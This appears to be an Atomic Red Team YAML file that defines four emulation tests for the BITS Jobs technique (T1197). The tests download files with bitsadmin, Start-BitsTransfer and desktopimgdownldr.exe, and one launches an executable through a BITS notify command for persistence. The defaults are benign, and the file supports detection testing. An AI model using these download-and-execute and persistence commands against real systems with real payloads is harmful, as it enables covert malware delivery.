attack_technique: T1197 display_name: BITS Jobs atomic_tests: - name: Bitsadmin Download (cmd) auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 description: | This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload supported_platforms: - windows input_arguments: remote_file: description: Remote file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md local_file: description: Local file path to save downloaded file type: path default: '%temp%\bitsadmin1_flag.ps1' executor: command: | bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} cleanup_command: | del #{local_file} >nul 2>&1 name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc description: | This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell Upon execution you will find a github markdown file downloaded to the Temp directory supported_platforms: - windows input_arguments: remote_file: description: Remote file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md local_file: description: Local file path to save downloaded file type: path default: $env:TEMP\bitsadmin2_flag.ps1 executor: command: | Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} cleanup_command: | Remove-Item #{local_file} -ErrorAction Ignore name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae description: | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. supported_platforms: - windows input_arguments: command_path: description: Path of command to execute type: path default: C:\Windows\system32\notepad.exe bits_job_name: description: Name of BITS job type: string default: AtomicBITS local_file: description: Local file path to save downloaded file type: path default: '%temp%\bitsadmin3_flag.ps1' remote_file: description: Remote file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md executor: command: | bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} cleanup_command: | del #{local_file} >nul 2>&1 name: command_prompt - name: Bits download using destktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 description: | This test simulates using destopimgdwnldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ supported_platforms: - windows input_arguments: remote_file: description: Remote file to download type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md download_path: description: Local file path to save downloaded file type: path default: 'SYSTEMROOT=C:\Windows\Temp' cleanup_path: description: path to delete file as part of cleanup_command type: path default: C:\Windows\Temp\Personalization\LockScreenImage cleanup_file: description: file to remove as part of cleanup_command type: string default: "*.md" executor: command: | set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr cleanup_command: | del #{cleanup_path}\#{cleanup_file} >null 2>&1 name: command_prompt